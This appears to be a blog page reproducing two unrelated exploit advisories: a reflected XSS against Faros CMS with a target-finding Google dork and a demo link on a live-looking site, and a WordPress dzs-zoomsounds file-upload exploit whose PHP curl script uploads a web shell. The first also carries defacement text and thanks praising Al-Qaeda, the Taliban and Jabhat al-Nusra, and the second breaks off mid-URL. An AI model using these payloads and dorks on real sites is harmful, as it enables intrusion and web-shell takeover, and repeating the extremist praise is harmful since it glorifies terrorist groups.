#########################################################
# Exploit Title: [ Faros CMS XSS Vulnerabilitie ]
########################################################
# Google Dork: [ intext:Copyright © 2011 - FarosWeb ]
# Date: [22/09/2015]
# Exploit Author: [Izza009 | Mujahidin Cyber Army]
# Vendor Homepage: [www.farosweb.com.br]
# Software Link: [-]
# Version: [app version] (REQUIRED)
# Tested on: [Win 8.1/Kali]
# CVE : [-]
########################################################
# Demo: http://delidoces.com.br/loja/admin/login/index.php?erro= Hacked%20by%20Mujahidin% 20Cyber%20Army%3Cbr%3EWe% 20Love%20Al%20Qaeda&url=
##########################################################
# Thanks to : Allah | Rosulullah | Tandhim Al-Qaeda | Thaliban | Jabhah Nushroh
# | United Islamic Cyber Force | Muslim Corporation Cyber | We Are Mujahidin Cyber Army
# Mujahidin Cyber Army : | Izza009 | xGame1945 | MrBz Elfatir | El-Muhajimi |[!] Jihad797 [!] | 1D10T
############################################################ ############################## ##############
################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS, array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...

Comments
Post a Comment